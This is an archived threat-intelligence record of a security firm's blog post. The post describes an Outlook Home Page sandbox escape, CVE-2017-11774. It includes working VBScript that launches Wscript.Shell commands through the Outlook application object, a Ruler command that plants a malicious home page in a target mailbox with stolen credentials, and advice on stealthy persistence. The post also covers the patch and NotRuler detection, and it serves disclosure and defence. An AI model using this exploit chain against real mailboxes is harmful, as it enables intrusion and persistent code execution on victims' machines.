{
	"id": "fe3cab30-eddc-4814-8917-a221f30ddf36",
	"created_at": "2026-04-06T00:06:56.516719Z",
	"updated_at": "2026-04-10T03:33:30.011945Z",
	"deleted_at": null,
	"sha1_hash": "706421ec2a415f0ea9829daa32d601429da1eade",
	"title": "Outlook Home Page – Another Ruler Vector",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 285843,
	"plain_text": "Outlook Home Page – Another Ruler Vector\r\nArchived: 2026-04-05 15:17:57 UTC\r\nRuler has become a go to tool for us on external engagements, easily turning compromised mailbox credentials\r\ninto shells. This has resulted in security being pushed forward and Microsoft responding with patches for the two\r\nvectors used in Ruler, namely rules and forms. These were patched with KB3191938 and KB4011091\r\nrespectively. \r\nThis puts us back into the cat and mouse game of attack versus defence, with attack needing to find a new vector.\r\nTurns out the rules of three holds true, and where two vulnerabilities lurk, a third surely exists.\r\ntl;dr There is a new attack built into Ruler. New version of Ruler: https://github.com/sensepost/ruler\r\nBut you need to read this post to get the exploit ;)\r\nThe Home Page\r\nWhile searching for a new code execution vector, we came across the Outlook Home Page, a legacy feature not\r\nmany use or are aware of. The homepage allows you to customise the default view for any folder in Outlook. This\r\nallows specifying a URL to be loaded and displayed whenever a folder is opened. This URL has to be either HTTP\r\nor HTTPS and can be either an internal or external network location.\r\nhttps://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/\r\nPage 1 of 8\n\nThe home page can be set through the Outlook GUI\r\nWhen Outlook loads the remote URL, it will render the contents using ieframe.dll, which means we have\r\nnumerous options available to us for customising the page. The one thing you want from an Outlook Home Page\r\nis the ability to include actual Outlook content into the page. To do this, the Outlook ActiveX controls can be used.\r\nA simple Outlook Home Page, which will display the message “Hello Alex” and  then display the contents of the\r\nfolder would look as follows:\r\n\u003chtml\u003e\r\n\u003chead\u003e\r\n\u003cmeta http-equiv=\"Content-Language\" content=\"en-us\"\u003e\r\n\u003cmeta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1252\"\u003e\r\n\u003ctitle\u003eOutlook\u003c/title\u003e\r\n\u003c/head\u003e\r\n\u003cbody\u003e\r\n\u003ch1\u003eHello Alex\u003c/h1\u003e\r\n \u003cobject classid=\"clsid:0006F063-0000-0000-C000-000000000046\" data=\"\" width=\"100%\" height=\"100%\"\u003e\u003c/ob\r\nhttps://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/\r\nPage 2 of 8\n\n\u003c/body\u003e\r\n\u003c/html\u003e\r\nThe magic source being the OutlookViewCtl CLSID embedded as an Object;\r\n\u003cobject classid=\"clsid:0006F063-0000-0000-C000-000000000046\" data=\"\" width=\"100%\" height=\"100%\"\u003e\u003c/obj\r\nAt this point we have a nice home page to display whenever we log into Outlook and we get greeted by name,\r\ngreat.\r\nActiveX Fun\r\nSince we have ActiveX controls and our page is hosted in an ieframe, it stands to reason that we should be able to\r\ninclude some vbscript/jscript to interact with the ActiveX control. And it turns out we can.\r\nThe first thing we did was try and skip straight to the command execution, maybe this ieframe isn’t constrained by\r\nthe usual security zones and other protections.\r\n\u003chtml\u003e\r\n\u003chead\u003e\r\n\u003cmeta http-equiv=\"Content-Language\" content=\"en-us\"\u003e\r\n\u003cmeta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1252\"\u003e\r\n\u003ctitle\u003eOutlook\u003c/title\u003e\r\n\u003cscript id=clientEventHandlersVBS language=vbscript\u003e\r\n\u003c!--\r\n Sub window_onload()\r\n Set cmd = CreateObject(\"Wscript.Shell\")\r\n cmd.Run(\"notepad\")\r\n End Sub\r\n--\u003e\r\n\u003c/script\u003e\r\n\u003c/head\u003e\r\n\u003cbody\u003e\r\n\u003ch1\u003eHello Alex\u003c/h1\u003e\r\n \u003cobject classid=\"clsid:0006F063-0000-0000-C000-000000000046\" data=\"\" width=\"100%\" height=\"100%\"\u003e\u003c/ob\r\n\u003c/body\u003e\r\n\u003c/html\u003e\r\nWe’ve simply created a window_onload function, which will execute as the page loads, and tasked it to create a\r\nnew object of type Wscript.Shell and then to execute the notepad application.\r\nUnfortunately this fails. The ieframe is loaded the typical Internet Explorer security zones, and certain\r\n“dangerous” objects can’t be created. Any attempts to access objects such\r\nas Wscript.Shell, Scripting.FileSystemObject and others will result in an error and our script will stop executing.\r\nEssentially, the only objects we can interact with are ones that pertain directly to Outlook.\r\nhttps://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/\r\nPage 3 of 8\n\nAccess is denied when trying to create blacklisted objects\r\nAt this point we went down a long rabbit hole of trying to get around this limitation by exploring the objects that\r\nare accessible. One of those being MSXML2.DOMDocument, and here we tried to use some XSL transforms to get\r\ncode execution however this also failed with the same message, “ActiveX component can’t create object”. As it\r\nturns out, the sandboxing applies to all scripting inside the ieframe, no matter how many objects down you go.\r\nNot wanting to give up, we revisited what we knew. We had ActiveX, we had custom vbscript and we could\r\ninteract with certain ActiveX controls, Outlook specific controls being one subset of those. This means we are able\r\nto directly interact with the ActiveX control already embedded into the page. This is simply done by directly\r\nreferencing the Object:\r\nSet Application = ViewCtl1\r\nNow that we have a “handle” the the ActiveX control, we can make use of functions and access objects belonging\r\nto that control. Here MSDN comes in handy, remember, documentation is your friend. Consulting the MSDN\r\ndocs, we find the OutlookApplication property, which according to the documentation “Returns an object that\r\nrepresents the container object for the control.” We can then access this with:\r\nSet Application = ViewCtl1.OutlookApplication\r\nWe now have a “handle” to the Application object for Outlook, and again we need to find what objects and\r\nmethods are available to us. Back to MSDN.\r\nOne of the available methods is the CreateObject method. This method allows us to create an automation object of\r\na specific class, just like the CreateObject usually used directly in VBScript.\r\n Set Application = ViewCtl1.OutlookApplication\r\n Set cmd = Application.CreateObject(\"Wscript.Shell\")\r\nhttps://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/\r\nPage 4 of 8\n\ncmd.Run(\"notepad\")\r\nAnd this worked, suddenly notepad popped up on the screen. It turns out that we now have a handle into an object\r\noutside of the ieframe sandbox. So we are back in the land of unrestricted vbscript. At this point exploitation\r\nbecomes relatively trivial.\r\nOur new home page can now be defined as:\r\n\u003chtml\u003e\r\n\u003chead\u003e\r\n\u003cmeta http-equiv=\"Content-Language\" content=\"en-us\"\u003e\r\n\u003cmeta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1252\"\u003e\r\n\u003ctitle\u003eOutlook\u003c/title\u003e\r\n\u003cscript id=clientEventHandlersVBS language=vbscript\u003e\r\n\u003c!--\r\n Sub window_onload()\r\n Set Application = ViewCtl1.OutlookApplication\r\n Set cmd = Application.CreateObject(\"Wscript.Shell\")\r\n cmd.Run(\"notepad\")\r\n End Sub\r\n--\u003e\r\n\u003c/script\u003e\r\n\u003c/head\u003e\r\n\u003cbody\u003e\r\n\u003ch1\u003e Hello Alex \u003c/h1\u003e\r\n\u003cobject classid=“clsid:0006F063-0000-0000-C000-000000000046” data=\"\" width=“100%” height=“100%\"\u003e\u003c/obj\r\n\u003c/body\u003e\r\n\u003c/html\u003e\r\nI reported this escape from the sandbox to MSFT and it was assigned CVE-2017-11774 and patched in the\r\nOctober updates.\r\nAnother thing about bug hunting, if you’ve thought of it, so has someone else. And just like Outlook forms, it\r\nturns out someone else was doing the same research. Again Nick Landers (@monoxgas) came across the same\r\nissue a little while after me, and pointed out a slightly different version of the attack; he made use of\r\nwindow.external  to get a handle to the OutlookApplication, rather than using the ActiveX Outlook viewctrl. This\r\nstill works, as OutlookApplication has been whitelisted for use in the ieframe.\r\nSub window_onload()\r\n Set oApp = window.external.OutlookApplication\r\n Set s = oApp.CreateObject(\"Wscript.Shell\")\r\nhttps://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/\r\nPage 5 of 8\n\ns.Run(\"notepad\")\r\n End Sub\r\nRemote Exploit\r\nThis was great, a third method for getting code exec in Outlook. The only problem at this point was that it was still\r\nmanual. How to turn this into an attack that can be conducted easily through Ruler?\r\nThis meant we had to go back to our trusted MFCMapi and find where the home page value is stored and if this is\r\nsynchronised through Exchange. Since we set the home page on the inbox, the properties of this folder were the\r\nobvious place to look for any changes.\r\nThe homepage is stored in the PR_FOLDER_WEBVIEWINFO property\r\nThe home page is stored in the PR_FOLDER_WEBVIEWINFO property\r\n(http://schemas.microsoft.com/mapi/proptag/0x36DF0102) which is an undocumented binary structure.\r\nFortunately, the creators of MFCMapi had reversed this structure and MFCMapi translated the various fields for\r\nus.\r\nMFCMapi smartview decodes the binary object for us\r\nAt this point we had all the information required to add this to Ruler. Since Ruler already has all the MAPI\r\nfunctions required to open a folder, set the properties on a folder and then synchronise these, it took about 30\r\nminutes to add the attack. Not too bad.\r\nThe main technical part was simply issuing a “SetProperties” request with the PR_FOLDER_WEBVIEWINFO\r\nproperty modified to point to our custom URL.\r\nRuler Homepage\r\nhttps://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/\r\nPage 6 of 8\n\nThe new version of Ruler now has homepage support, so grab the “EkoParty” release from the github releases (or\r\nthe source code of course).\r\nTo use the new function couldn’t be simpler. First things first, create your homepage .html page, using the\r\nexample earlier in this post, you’ll need to swap out “notepad” for your command, so be creative. This needs to be\r\nhosted on a webserver, it doesn’t matter where.\r\nTo set the home page via Ruler:\r\n./ruler --email target@pew.com homepage add --url https://gist.githubusercontent.com/staaldraad/c7b85\r\nAs simple as that. The home page can be viewed and deleted using the “display” and “delete” functions\r\nrespectively, just as you would for forms or rules.\r\nAttack Attack\r\nThe Ruler wiki has also been updated with all the necessary bits.\r\nTrigger\r\nYou might be wondering at this stage, “how do I trigger my shell?”, well you don’t. Outlook does this for you.\r\nThe home page, once set, will be triggered when the folder is refreshed. This is usually triggered when the user\r\nnavigates out of the inbox, for example views “sent items” and navigates back into the inbox. Or Outlook is\r\nrestarted.\r\n0:00 / 1:18\r\nhttps://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/\r\nPage 7 of 8\n\nOutlook needs to be notified that the folder has changed and needs to be refreshed. Ruler will try and force this by\r\ncreating a hidden folder in the Inbox. This changes the last modified date on the folder, property changes don’t,\r\nsignalling to Outlook that a refresh is need. When the user navigates away from the inbox and back, the home\r\npage will refresh and the exploit will trigger. This folder will be deleted when you delete the home page using\r\nRuler.\r\nThis does have the downside of not allowing you to easily trigger the homepage straight away, but you gain a\r\nstealthy persistence method. I can also recommend you build some “shell checks” into your exploit, as the home\r\npage gets cached by Outlook, so the exploit may trigger even after you have unset the home page value.\r\nOtherwise, if you like multiple shells from a single host, leave it as is.\r\nDefence\r\nTo defend against this you have multiple options, but the primary one is, apply the patch (KB4011162). With this\r\npatch Microsoft have completely removed the ‘home page’ feature from Outlook. By killing off legacy features\r\nthey are successfully reducing the attack surface and protecting end-users.\r\nGood architecture and sound security practices go a long way to preventing this, and any attack via Outlook.\r\nEnsure 2FA/MFA is deployed for user accounts and password best practices are followed. Monitoring breaches\r\nand identifying employee accounts that are present in those breaches goes a long way to making attackers lives\r\nharder. If your employees used their corporate account on a breached site, reset their password, people love\r\nreusing credentials.\r\nDetection of this attack has also been added to NotRuler and you can easily detect this with:\r\n./notruler --mailboxes organisationList.txt --username exchadm homepage\r\nWe wrote a blog post detailing NotRuler a little while back. You can get NotRuler from:\r\nhttps://github.com/sensepost/notruler\r\nEkoParty 2017\r\nWe would also like to thank the EkoParty crew for an amazing conference and for hosting us in Buenos Aires this\r\nyear. It was our pleasure to be able to present Ruler at the con and we are looking forward to going back. If you\r\nwould like to view the slides and a recording of the talk, they will be available on the EkoParty site\r\nshortly: https://ekoparty.org/archivo.php\r\nGet Ruler: https://github.com/sensepost/ruler\r\nSource: https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/\r\nhttps://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/\r\nPage 8 of 8\n\n\u003cbody\u003e \u003ch1\u003eHello Alex\u003c/h1\u003e   \n\u003cobject classid=\"clsid:0006F063-0000-0000-C000-000000000046\"  data=\"\" width=\"100%\" height=\"100%\"\u003e\u003c/ob\n Page 2 of 8",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/"
	],
	"report_names": [
		"outlook-home-page-another-ruler-vector"
	],
	"threat_actors": [
		{
			"id": "dcba8e2b-93e0-4d6e-a15f-5c44faebc3b1",
			"created_at": "2022-10-25T16:07:23.816991Z",
			"updated_at": "2026-04-10T02:00:04.758143Z",
			"deleted_at": null,
			"main_name": "Lurk",
			"aliases": [],
			"source_name": "ETDA:Lurk",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434016,
	"ts_updated_at": 1775792010,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/706421ec2a415f0ea9829daa32d601429da1eade.pdf",
		"text": "https://archive.orkl.eu/706421ec2a415f0ea9829daa32d601429da1eade.txt",
		"img": "https://archive.orkl.eu/706421ec2a415f0ea9829daa32d601429da1eade.jpg"
	}
}